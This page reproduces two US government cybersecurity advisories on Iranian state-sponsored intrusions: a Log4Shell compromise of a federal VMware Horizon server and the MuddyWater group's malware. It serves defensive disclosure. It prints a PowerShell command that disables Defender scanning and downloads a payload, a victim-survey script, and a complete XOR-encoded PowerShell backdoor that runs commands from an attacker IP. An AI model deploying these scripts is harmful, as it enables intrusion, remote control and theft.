Tag Archive for: GovernmentSponsored

Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester

/in


From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch (FCEB) organization where CISA observed suspected advanced persistent threat (APT) activity. In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. CISA and the Federal Bureau of Investigation (FBI) assess that the FCEB network was compromised by Iranian government-sponsored APT actors.

CISA and FBI are releasing this Cybersecurity Advisory (CSA) providing the suspected Iranian government-sponsored actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.

CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities. If suspected initial access or compromise is detected based on IOCs or TTPs described in this CSA, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems (including the DC), and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this CSA to protect against similar malicious cyber activity.

For more information on Iranian government-sponsored Iranian malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threats webpage.

Download the PDF version of this report: pdf, 528 kb.

For a downloadable copy of the Malware Analysis Report (MAR) accompanying this report, see: MAR 10387061-1.v1.

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques with corresponding mitigation and/or detection recommendations.

Overview

In April 2022, CISA conducted retrospective analysis using EINSTEIN—an FCEB-wide intrusion detection system (IDS) operated and monitored by CISA—and identified suspected APT activity on an FCEB organization’s network. CISA observed bi-directional traffic between the network and a known malicious IP address associated with exploitation of the Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon servers. In coordination with the FCEB organization, CISA initiated threat hunting incident response activities; however, prior to deploying an incident response team, CISA observed additional suspected APT activity. Specifically, CISA observed HTTPS activity from IP address 51.89.181[.]64 to the organization’s VMware server. Based on trusted third-party reporting, 51.89.181[.]64 is a Lightweight Directory Access Protocol (LDAP) server associated with threat actors exploiting Log4Shell. Following HTTPS activity, CISA observed a suspected LDAP callback on port 443 to this IP address. CISA also observed a DNS query for us‐nation‐ny[.]cf that resolved back to 51.89.181[.]64 when the victim server was returning this Log4Shell LDAP callback to the actors’ server.

CISA assessed that this traffic indicated a confirmed compromise based on the successful callback to the indicator and informed the organization of these findings; the organization investigated the activity and found signs of compromise. As trusted-third party reporting associated Log4Shell activity from 51.89.181[.]64 with lateral movement and targeting of DCs, CISA suspected the threat actors had moved laterally and compromised the organization’s DC.

From mid-June through mid-July 2022, CISA conducted an onsite incident response engagement and determined that the organization was compromised as early as February 2022, by likely Iranian government-sponsored APT actors who installed XMRig crypto mining software. The threat actors also moved laterally to the domain controller, compromised credentials, and implanted Ngrok reverse proxies.

Threat Actor Activity

In February 2022, the threat actors exploited Log4Shell [T1190] for initial access [TA0001] to the organization’s unpatched VMware Horizon server. As part of their initial exploitation, CISA observed a connection to known malicious IP address 182.54.217[.]2 lasting 17.6 seconds.

The actors’ exploit payload ran the following PowerShell command [T1059.001] that added an exclusion tool to Windows Defender [T1562.001]:

powershell try{Add-MpPreference -ExclusionPath ‘C:\’; Write-Host ‘added-exclusion’} catch {Write-Host ‘adding-exclusion-failed’ }; powershell -enc “$BASE64 encoded payload to download next stage and execute it”

The exclusion tool allowlisted the entire c:\drive, enabling threat actors to download tools to the c:\drive without virus scans. The exploit payload then downloaded mdeploy.text from 182.54.217[.]2/mdepoy.txt to C:\users\public\mde.ps1 [T1105]. When executed, mde.ps1 downloaded file.zip from 182.54.217[.]2 and removed mde.ps1 from the disk [T1070.004].

file.zip contained XMRig cryptocurrency mining software and associated configuration files.

  • WinRing0x64.sys – XMRig Miner driver
  • wuacltservice.exe – XMRig Miner
  • config.json – XMRig miner configuration
  • RuntimeBroker.exe – Associated file. This file can create a local user account [T1136.001] and tests for internet connectivity by pinging 8.8.8.8 [T1016.001]. The exploit payload created a Scheduled Task [T1053.005] that executed RuntimeBroker.exe daily as SYSTEM. Note: By exploiting Log4Shell, the actors gained access to a VMware service account with administrator and system level access. The Scheduled Task was named RuntimeBrokerService.exe to masquerade as a legitimate Windows task.

See MAR 10387061-1.v1 for additional information, including IOCs, on these four files.

After obtaining initial access and installing XMRig on the VMWare Horizon server, the actors used RDP [T1021.001] and the built-in Windows user account DefaultAccount [T1078.001] to move laterally [TA0008] to a VMware VDI-KMS host. Once the threat actor established themselves on the VDI-KMS host, CISA observed the actors download around 30 megabytes of files from transfer[.]sh server associated with 144.76.136[.]153. The actors downloaded the following tools:

  • PsExec – a Microsoft signed tool for system administrators.
  • Mimikatz – a credential theft tool.
  • Ngrok – a reverse proxy tool for proxying an internal service out onto an Ngrok domain, which the user can then access at a randomly generated subdomain at *.ngrok[.]io. CISA has observed this tool in use by some commercial products for benign purposes; however, this process bypasses typical firewall controls and may be a potentially unwanted application in production environments. Ngrok is known to be used for malicious purposes.[1]

The threat actors then executed Mimikatz on VDI-KMS to harvest credentials and created a rogue domain administrator account [T1136.002]. Using the newly created account, the actors leveraged RDP to propagate to several hosts within the network. Upon logging into each host, the actors manually disabled Windows Defender via the Graphical User Interface (GUI) and implanted Ngrok executables and configuration files. The threat actors were able to implant Ngrok on multiple hosts to ensure Ngrok’s persistence should they lose access to a machine during a routine reboot. The actors were able to proxy [T1090] RDP sessions, which were only observable on the local network as outgoing HTTPS port 443 connections to tunnel.us.ngrok[.]com and korgn.su.lennut[.]com (the prior domain in reverse). It is possible, but was not observed, that the threat actors configured a custom domain, or used other Ngrok tunnel domains, wildcarded here as *.ngrok[.]com, *.ngrok[.]io, ngrok.*.tunnel[.]com, or korgn.*.lennut[.]com.

Once the threat actors established a deep foothold in the network and moved laterally to the domain controller, they executed the following PowerShell command on the Active Directory to obtain a list of all machines attached to the domain [T1018]:

Powershell.exe get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address >

The threat actors also changed the password for the local administrator account [T1098] on several hosts as a backup should the rogue domain administrator account get detected and terminated. Additionally, the threat actor was observed attempting to dump the Local Security Authority Subsystem Service (LSASS) process [T1003.001] with task manager but this was stopped by additional anti-virus the FCEB organization had installed.

MITRE ATT&CK TACTICS AND TECHNIQUES

See table 1 for all referenced threat actor tactics and techniques in this advisory, as well as corresponding detection and/or mitigation recommendations. For additional mitigations, see the Mitigations section.

Table 1: Cyber Threat Actors ATT&CK Techniques for Enterprise

Initial Access

Technique Title

ID

Use

Recommendations

Exploit Public-Facing Application

T1190

The actors exploited Log4Shell for initial access to the organization’s VMware Horizon server.

Mitigation/Detection: Use a firewall or web-application firewall and enable logging to prevent and detect potential Log4Shell exploitation attempts [M1050].

Mitigation: Perform regular vulnerability scanning to detect Log4J vulnerabilities and update Log4J software using vendor provided patches [M1016],[M1051].

Execution

Technique Title

ID

Use

Recommendation

Command and Scripting Interpreter: PowerShell

T1059.001

The actors ran PowerShell commands that added an exclusion tool to Windows Defender.

The actors executed PowerShell on the AD to obtain a list of machines on the domain.

Mitigation: Disable or remove PowerShell for non-administrative users [M1042],[M1026] or enable code-signing to execute only signed scripts [M1045].

Mitigation: Employ anti-malware to automatically detect and quarantine malicious scripts [M1049].

Persistence

Technique Title

ID

Use

Recommendations

Account Manipulation

T1098

The actors changed the password for the local administrator account on several hosts.

Mitigation: Use multifactor authentication for user and privileged accounts [M1032].

Detection: Monitor events for changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728, and 4670. Monitor for modification of accounts in correlation with other suspicious activity [DS0002].

Create Account: Local Account

T1136.001

The actors’ malware can create local user accounts.

Mitigation: Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts.

Detection: Monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add , useradd, and dscl -create [DS0017].

Detection: Enable logging for new user creation [DS0002].

Create Account: Domain Account

T1136.002

The actors used Mimikatz to create a rogue domain administrator account.

Mitigation: Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts.

Detection: Enable logging for new user creation, especially domain administrator accounts [DS0002].

Scheduled Task/Job: Scheduled Task

T1053.005

The actors’ exploit payload created Scheduled Task RuntimeBrokerService.exe, which executed RuntimeBroker.exe daily as SYSTEM.

Mitigation: Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM [M1028].

Detection: Monitor for newly constructed processes and/or command-lines that execute from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows [DS0009]

Detection: Monitor for newly constructed scheduled jobs by enabling the Microsoft-Windows-TaskScheduler/Operational setting within the event logging service [DS0003].

Valid Accounts: Default Accounts

T1078.001

The actors used built-in Windows user account DefaultAccount.

Mitigation: Change default usernames and passwords immediately after the installation and before deployment to a production environment [M1027].

Detection: Develop rules to monitor logon behavior across default accounts that have been activated or logged into [DS0028].

Defense Evasion

Technique Title

ID

Use

Recommendations

Impair Defenses: Disable or Modify Tools

           

T1562.001

The actors added an exclusion tool to Windows Defender. The tool allowlisted the entire c:\drive, enabling the actors to bypass virus scans for tools they downloaded to the c:\drive.

The actors manually disabled Windows Defender via the GUI.

Mitigation: Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security services. [M1018].

Detection: Monitor for changes made to Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender [DS0024].

Detection: Monitor for telemetry that provides context for modification or deletion of information related to security software processes or services such as Windows Defender definition files in Windows and System log files in Linux [DS0013].

Detection: Monitor processes for unexpected termination related to security tools/services [DS0009].

Indicator Removal on Host: File Deletion

T1070.004

The actors removed malicious file mde.ps1 from the dis.

Detection: Monitor executed commands and arguments for actions that could be utilized to unlink, rename, or delete files [DS0017].

Detection: Monitor for unexpected deletion of files from the system [DS0022].

Credential Access

Technique Title

ID

Use

Recommendations

OS Credential Dumping: LSASS Memory

T1003.001

The actors were observed trying to dump LSASS process.

Mitigation: With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping [M1043]

Mitigation: On Windows 10, enable Attack Surface Reduction (ASR) rules to secure LSASS and prevent credential stealing [M1040].

Mitigation: Ensure that local administrator accounts have complex, unique passwords across all systems on the network [M1027].

Detection: Monitor for unexpected processes interacting with LSASS.exe. Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. [DS0009].

Detection: Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of the LSASS [DS0017].

Credentials from Password Stores

T1555

The actors used Mimikatz to harvest credentials.

Mitigation: Organizations may consider weighing the risk of storing credentials in password stores and web browsers. If system, software, or web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in improper locations [M1027].

Detection: Monitor for processes being accessed that may search for common password storage locations to obtain user credentials [DS0009].

Detection: Monitor executed commands and arguments that may search for common password storage locations to obtain user credentials [DS0017].

Discovery

Technique Title

ID

Use

Recommendations

Remote System Discovery

T1018

The actors executed a PowerShell command on the AD to obtain a list of all machines attached to the domain.

Detection: Monitor executed commands and arguments that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement [DS0017].

Detection: Monitor for newly constructed network connections associated with pings/scans that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement [DS0029].

Detection: Monitor for newly executed processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession [DS0009].

System Network Configuration Discovery: Internet Connection Discovery

T1016.001

The actors’ malware tests for internet connectivity by pinging 8.8.8.8.

Mitigation: Monitor executed commands, arguments [DS0017] and executed processes (e.g., tracert or ping) [DS0009] that may check for internet connectivity on compromised systems.

Lateral Movement

Technique Title

ID

Use

Recommendations

Remote Services: Remote Desktop Protocol

T1021.001

The actors used RDP to move laterally to multiple hosts on the network.

Mitigation: Use MFA for remote logins [M1032].

Mitigation: Disable the RDP service if it is unnecessary [M1042].

Mitigation: Do not leave RDP accessible from the internet. Enable firewall rules to block RDP traffic between network security zones within a network [M1030].

Mitigation: Consider removing the local Administrators group from the list of groups allowed to log in through RDP [M1026].

Detection: Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10). Other factors, such as access patterns (ex: multiple systems over a relatively short period of time) and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP [DS0028].

Command and Control

Technique Title

ID

Use

Recommendations

Proxy

T1090

The actors used Ngrok to proxy RDP connections and to perform command and control.

Mitigation: Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists [M1037].

Detection: Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure) [DS0029].

Ingress Tool Transfer

T1105

The actors downloaded malware and multiple tools to the network, including PsExec, Mimikatz, and Ngrok.

Mitigation: Employ anti-malware to automatically detect and quarantine malicious scripts [M1049].

 

 

INCIDENT RESPONSE

If suspected initial access or compromise is detected based on IOCs or TTPs in this CSA, CISA encourages organizations to assume lateral movement by threat actors and investigate connected systems and the DC.

CISA recommends organizations apply the following steps before applying any mitigations, including patching.

  1. Immediately isolate affected systems.
  2. Collect and review relevant logs, data, and artifacts. Take a memory capture of the device(s) and a forensic image capture for detailed analysis.
  3. Consider soliciting support from a third-party incident response organization that can provide subject matter expertise to ensure the actor is eradicated from the network and to avoid residual issues that could enable follow-on exploitation.
  4. Report incidents to CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870) or your local FBI field office, or FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [email protected].
     

CISA and FBI recommend implementing the mitigations below and in Table 1 to improve your organization’s cybersecurity posture on the basis of threat actor behaviors.

  • Install updated builds to ensure affected VMware Horizon and UAG systems are updated to the latest version.
    • If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat those VMware Horizon systems as compromised. Follow the pro-active incident response procedures outlined above prior to applying updates. If no compromise is detected, apply these updates as soon as possible.
      • See VMware Security Advisory VMSA-2021-0028.13 and VMware Knowledge Base (KB) 87073 to determine which VMware Horizon components are vulnerable.
      • Note: Until the update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible.
      • If upgrading is not immediately feasible, see KB87073 and KB87092 for vendor-provided temporary workarounds. Implement temporary solutions using an account with administrative privileges. Note that these temporary solutions should not be treated as permanent fixes; vulnerable components should be upgraded to the latest build as soon as possible.
      • Prior to implementing any temporary solution, ensure appropriate backups have been completed.
      • Verify successful implementation of mitigations by executing the vendor supplied script Horizon_Windows_Log4j_Mitigations.zip without parameters to ensure that no vulnerabilities remain. See KB87073 for details.
  • Keep all software up to date and prioritize patching known exploited vulnerabilities (KEVs).
  • Minimize the internet-facing attack surface by hosting essential services on a segregated DMZ, ensuring strict network perimeter access controls, and not hosting internet-facing services that are not essential to business operations. Where possible, implement regularly updated web application firewalls (WAF) in front of public-facing services. WAFs can protect against web-based exploitation using signatures and heuristics that are likely to block or alert on malicious traffic.
  • Use best practices for identity and access management (IAM) by implementing phishing resistant multifactor authentication (MFA), enforcing use of strong passwords, regularly auditing administrator accounts and permissions, and limiting user access through the principle of least privilege. Disable inactive accounts uniformly across the AD, MFA systems, etc.
    • If using Windows 10 version 1607 or Windows Server 2016 or later, monitor or disable Windows DefaultAccount, also known as the Default System Managed Account (DSMA).
  • Audit domain controllers to log successful Kerberos Ticket Granting Service (TGS) requests and ensure the events are monitored for anomalous activity.  
    • Secure accounts.
    • Enforce the principle of least privilege. Administrator accounts should have the minimum permission necessary to complete their tasks.
    • Ensure there are unique and distinct administrative accounts for each set of administrative tasks.
    • Create non-privileged accounts for privileged users and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).
  • Create a deny list of known compromised credentials and prevent users from using known-compromised passwords.
  • Secure credentials by restricting where accounts and credentials can be used and by using local device credential protection features. 
    • Use virtualizing solutions on modern hardware and software to ensure credentials are securely stored.
    • Ensure storage of clear text passwords in LSASS memory is disabled. Note: For Windows 8, this is enabled by default. For more information see Microsoft Security Advisory Update to Improve Credentials Protection and Management.
    • Consider disabling or limiting NTLM and WDigest Authentication.
    • Implement Credential Guard for Windows 10 and Server 2016 (refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
    • Minimize the AD attack surface to reduce malicious ticket-granting activity. Malicious activity such as “Kerberoasting” takes advantage of Kerberos’ TGS and can be used to obtain hashed credentials that threat actors attempt to crack.
       

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see table 1).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Source…

Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

/in


Summary

Actions to Take Today to Protect Against Malicious Activity
* Search for indicators of compromise.
* Use antivirus software.
* Patch all systems.
* Prioritize patching known exploited vulnerabilities.
* Train users to recognize and report phishing attempts.
* Use multi-factor authentication.

Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity. 

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. 

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.

Click here for a PDF version of this report.

Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 

As part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file to the victim’s network [T1566.001, T1204.002]. MuddyWater actors also use techniques such as side-loading DLLs [T1574.002] to trick legitimate programs into running malware and obfuscating PowerShell scripts [T1059.001] to hide C2 functions [T1027] (see the PowGoop section for more information). 

Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [TA0003], and exfiltration [TA0010]. See below for descriptions of some of these malware sets, including newer tools or variants to the group’s suite. Additionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater for further details.

PowGoop

MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.

According to samples of PowGoop analyzed by CISA and CNMF, PowGoop consists of three components:

  • A DLL file renamed as a legitimate filename, Goopdate.dll, to enable the DLL side-loading technique [T1574.002]. The DLL file is contained within an executable, GoogleUpdate.exe
  • A PowerShell script, obfuscated as a .dat file, goopdate.dat, used to decrypt and run a second obfuscated PowerShell script, config.txt [T1059.001].
  • config.txt, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.

These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. 

Small Sieve

According to a sample analyzed by NCSC-UK, Small Sieve is a simple Python [T1059.006] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installs the Python backdoor, index.exe, and adds it as a registry run key [T1547.001], enabling persistence [TA0003]. 

MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft’s Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., “Microsift”) and Outlook in its filenames associated with Small Sieve [T1036.005].

Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve’s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027], T1132.002].

Note: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. 

See Appendix B for further analysis of Small Sieve malware.

Canopy

MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. 

In the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [T1204.002]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.

The first .wsf is installed in the current user startup folder [T1547.001] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [T1027]. The file executes a command to run the second .wsf.

The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0035] the victim system’s IP address, computer name, and username [T1005]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [T1041].

Mori

MuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group’s C2 infrastructure [T1572]. 

According to one sample analyzed by CISA, FML.dll, Mori uses a DLL written in C++ that is executed with regsvr32.exe with export DllRegisterServer; this DLL appears to be a component to another program. FML.dll contains approximately 200MB of junk data [T1001.001] in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:

  • Deletes the file FILENAME.old and deletes file by registry value. The filename is the DLL file with a .old extension.
  • Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.
  • Uses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.
  • Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [T1071.001].
  • Reads and/or writes data from the following Registry Keys, HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default).

POWERSTATS

This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [T1059.001]. 

CNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools— along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository, Virus Total. Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.

MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability (CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). See CISA’s Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.

Survey Script

The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.

$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += “;;”;$ips = “”;Get-WmiObject Win32_NetworkAdapterConfiguration -Filter “IPEnabled=True” | % {$ips = $ips + “, ” + $_.IPAddress[0]};$S += $ips.substring(1);$S += “;;”;$S += $O.OSArchitecture;$S += “;;”;$S += [System.Net.DNS]::GetHostByName(”).HostName;$S += “;;”;$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += “;;”;$S += $env:UserName;$S += “;;”;$AntiVirusProducts = Get-WmiObject -Namespace “root\SecurityCenter2” -Class AntiVirusProduct  -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;

Newly Identified PowerShell Backdoor

The newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.

function encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create(‘http://95.181.161.49:80/index.php?id=<victim identifier>’);$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create(‘http://95.181.161.49:80/index.php?id=<victim identifier>’);$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add(‘cookie’,(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}

MITRE ATT&CK Techniques

MuddyWater uses the ATT&CK techniques listed in table 1.

Table 1: MuddyWater ATT&CK Techniques[2]

Technique Title ID Use
Reconnaissance
Gather Victim Identity Information: Email Addresses T1589.002 MuddyWater has specifically targeted government agency employees with spearphishing emails.
Resource Development
Acquire Infrastructure: Web Services T1583.006 MuddyWater has used file sharing services including OneHub to distribute tools.
Obtain Capabilities: Tool T1588.002 MuddyWater has made use of legitimate tools ConnectWise and RemoteUtilities for access to target environments.
Initial Access
Phishing: Spearphishing Attachment T1566.001 MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments. 
Phishing: Spearphishing Link T1566.002 MuddyWater has sent targeted spearphishing emails with malicious links.
Execution
Windows Management Instrumentation T1047 MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.
Command and Scripting Interpreter: PowerShell T1059.001 MuddyWater has used PowerShell for execution.
Command and Scripting Interpreter: Windows Command Shell 1059.003 MuddyWater has used a custom tool for creating reverse shells.
Command and Scripting Interpreter: Visual Basic T1059.005 MuddyWater has used Virtual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.
Command and Scripting Interpreter: Python T1059.006 MuddyWater has used developed tools in Python including Out1. 
Command and Scripting Interpreter: JavaScript T1059.007 MuddyWater has used JavaScript files to execute its POWERSTATS payload.
Exploitation for Client Execution T1203 MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.
User Execution: Malicious Link T1204.001 MuddyWater has distributed URLs in phishing emails that link to lure documents.
User Execution: Malicious File T1204.002 MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.
Inter-Process Communication: Component Object Model T1559.001 MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
Inter-Process Communication: Dynamic Data Exchange T1559.002 MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.
Persistence
Scheduled Task/Job: Scheduled Task T1053.005 MuddyWater has used scheduled tasks to establish persistence.
Office Application Startup: Office Template Macros T1137.001 MuddyWater has used a Word Template, Normal.dotm, for persistence.
